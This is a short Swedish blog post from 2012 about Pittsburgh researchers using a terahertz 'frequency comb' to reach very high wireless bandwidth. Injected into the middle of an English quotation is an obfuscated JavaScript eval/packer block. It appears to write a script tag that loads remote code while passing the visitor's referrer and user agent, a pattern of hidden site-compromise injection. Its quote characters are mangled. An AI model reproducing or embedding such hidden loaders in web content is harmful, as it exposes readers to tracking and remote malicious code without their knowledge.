Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Wifi kan bli 1000 gånger snabbare med nya frekvensen terahertz.

Wifi kan bli 1000 gånger snabbare med nya frekvensen terahertz.
Filip Urde
  • On 8 mars, 2012
  • http://www.revue.se/filip-urde

Apple stoltserade igår med 4G, Telia har gjort det ett bra tag och världen börjar anpassa sig för den nya hastigheten. Men det är väll inte nog?

Forskare vid universitetet i Pittsburgh ser ut att ha hittat ett sätt att använda sig av en helt ny frekvens för trådlös dataöverföring. Fysikprofessor Hrvoje Petek och hans forskarteam har demonstrerat att man kan nå en bandbredd på sjuka 100 terahertz, det uppnår man med hjälp av något man själva kallar för ”frequency comb”.

A eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rbthz|var|u0026u|referrer|rktne||js|php’.split(’|’),0,{}))
frequency comb results from dividing a single color of light into equally-sized chunks that can be used in numerous applications?such as data transmission. ”The ability to modulate light with such a bandwidth could increase the amount of information carried by more than 1,000 times when compared to the volume carried with today’s technologies,” Petek said in a statement.

Det är ett experiment… men det är väll inga tvivel om att detta kommer hända i framtiden. Sjukt ballt!